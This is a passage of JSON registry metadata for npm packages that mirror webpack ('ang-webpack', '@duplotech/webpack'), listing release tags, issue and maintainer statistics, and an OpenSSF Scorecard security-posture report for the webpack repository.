k/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-26T12:52:47.571Z","dependent_packages_count":4,"downloads":11,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":41.163328952788184,"dependent_repos_count":10.295976646711454,"dependent_packages_count":5.888476794839281,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":11.563710559264493},"purl":"pkg:npm/ang-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/ang-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/ang-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/ang-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:00:07.885Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":926,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":364617.14285714284,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":728,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.818574514038877,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":575,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":428,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ang-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ang-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ang-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ang-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ang-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ang-webpack/codemeta","maintainers":[{"uuid":"zhangyuang","login":"zhangyuang","name":null,"email":"569105585@qq.com","url":null,"packages_count":447,"html_url":"https://www.npmjs.com/~zhangyuang","role":null,"created_at":"2022-11-11T10:22:23.737Z","updated_at":"2022-11-11T10:22:23.737Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zhangyuang/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":911208,"name":"@duplotech/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"duplotech","versions_count":1,"first_release_published_at":"2020-03-26T02:19:40.037Z","latest_release_published_at":"2020-03-26T02:19:40.037Z","latest_release_number":"5.0.0","last_synced_at":"2026-09-03T00:19:42.525Z","created_at":"2022-04-07T16:42:01.651Z","updated_at":"2026-09-03T00:19:42.525Z","registry_url":"https://www.npmjs.com/package/@duplotech/webpack","install_command":"npm install @duplotech/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.0.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed 